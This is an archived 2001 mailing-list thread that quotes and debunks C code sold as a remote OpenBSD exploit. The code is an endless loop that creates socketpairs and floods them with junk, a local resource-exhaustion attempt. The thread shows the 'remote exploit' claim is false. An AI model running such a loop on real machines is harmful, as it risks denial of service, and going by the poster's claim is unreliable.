The code doesnt do anything. I ran it on an obsd 2.8 machine and the state of the machine after execution was same as before. From what i understand from this code, it simply opens up a 2 local (PF_UNIX) sockets, and writes some garbage to both of them. socket option calls change recieve and send buffers on the socket, which i guess has something to do with the size of the garbage we send to the local sockets. fcntl call sets non block flag on the sockets (im not sure i understand what this is, and the man pages are rather concise on this, but i guess it makes it a non-block device?), and then two write calls, where the crap gets written into sockets. now, i am by no means an expert or even an experienced programmer, and this analysis is my attempt to understand unix programming better, so please, all flames are welcome. im posting this just to see if my assumtions are correct, not to actually give a guru-level analysis. (so if this isnt posted, i'll live) thanks for letting me waste everyone's time : ) max On Wed, 6 Jun 2001, Blue Boar wrote: > I let this through so that it might be refuted. > > Now, I'm no expert on the socket calls... but it seems > to me that if this were a remote exploit, there > would have to be a destination IP address..or port > number.. or, you know, some sort of shellcode or > something. > > So what is it then, a fork bomb for the machine that runs it? > > Ryan > > Fsck Theo Dumbraadt wrote: > > > > This code shows a remote exploit for opensbsd versions 2.8 and 2.9 > > > > and can now be released to the public to break theo's 4 years without > > > > remote exploits sayings. I wrote it while people told me it could not > > > > happen on the list so here is your proofs bitch. > > > > // > > > > // peewee.c > > > > // peewee herman prove of consept this code will show all of the > > > > // world how vulnirable OpenBSD is and how Theo Dumbraadt is > > > > // not more than a liar copyraadt 2001 by Jigglypuff > > > > // http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg > > > > // this proggie is GPL licensed to those who use it keep my > > > > // credits and not be a lamer > > > > // > > > > #include <unistd.h> > > > > #include <sys/socket.h> > > > > #include <fcntl.h> > > > > #define BUFFERSIZE 409600 > > > > extern int > > > > main(void) > > > > { > > > > int p[2], i; > > > > char crap[BUFFERSIZE]; > > > > while (1) > > > > { > > > > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > > > > break; > > > > i = BUFFERSIZE; > > > > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > > > > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > > > > fcntl(p[0], F_SETFL, O_NONBLOCK); > > > > fcntl(p[1], F_SETFL, O_NONBLOCK); > > > > write(p[0], crap, BUFFERSIZE); > > > > write(p[1], crap, BUFFERSIZE); > > > > } > > > > return(0); > > > > } > > > > * Get your free email at http://www.inbox.net >
This archive was generated by hypermail 2b30 : Wed Jun 06 2001 - 20:03:43 PDT
